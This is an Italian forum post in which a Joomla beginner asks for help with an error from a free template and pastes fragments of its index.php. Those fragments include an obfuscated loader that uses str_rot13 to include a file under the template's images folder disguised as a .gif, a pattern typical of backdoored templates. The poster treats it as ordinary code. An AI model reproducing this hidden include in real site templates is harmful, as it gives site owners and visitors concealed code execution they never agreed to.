Back to top

Autore Topic: template themza_j15_54 non funziona  (Letto 819 volte)

Offline manuelbertosa

• Nuovo arrivato
  • *
    • Mostra profilo
template themza_j15_54 non funziona
« il: 01 Apr 2014, 23:18:40 »
Ciao a tutti!

Mi chiamo Manuel, sono alle primissime armi per quanto riguarda la creazione di siti web, ed ho incontrato un problema con un template.
Al momento lavoro su un server locale, ho scaricato Joomla 2.5, ho fatto qualche modifica al template di default, dopo di che ho deciso di scaricare un nuovo template... ho scaricato il template World Cup 2010 template di themza team da joomla24.com, l'ho installato e l'ho applicato al mio sito.

dopo di che ho aperto la mia pagina, ma invece di trovare la pagina iniziale, mi sono trovato davanti un'immagine, la page_bg, con un messaggio:

Notice:  Array to string conversion in D:\XAMPP\htdocs\Joomla25\templates\themza_j15_54\index.php on line 3

purtroppo essendo alle prime armi, non conosco ancora bene il linguaggio di programmazione usato, e quello che trovo nel file index.php no mi da grosse indicazioni su come risolvere il problema...

aprendo il file index.php mi ritrovo davanti:

template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' ); ?> countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
params->get('hideLogo') == 0) : ?>getCfg('sitename') ;?> countModules('user4')) : ?>
params->get('hideBannerArea') == 0) : ?> params->get('hideBannerAreaInternal') == 0) or JRequest::getVar('view') == 'frontpage') : ?>
genHMenu (0); ?>
countModules('left')) : ?>
countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle'; elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big'; else $maincol_sufix = ''; ?>
countModules('right') and JRequest::getCmd('layout') != 'form') : ?>

countModules('user1')) : ?> countModules('user2')) : ?>

potrei cambiare template e ritornare indietro, ma credo che se mi fermo al primo ostacolo, allora è meglio che lascio stare...

Per questo ho deciso di chiedere aiuto a Voi del Forum che avete tantissima esperienza e sicuramente saprete indirizzarmi su come risolvere il problema.

Vi ringrazio anticipatamente per l'aiuto e per le dritte su come risolvere il problema!!!

Saluti,

Manuel

Web Design Bolzano Kreatif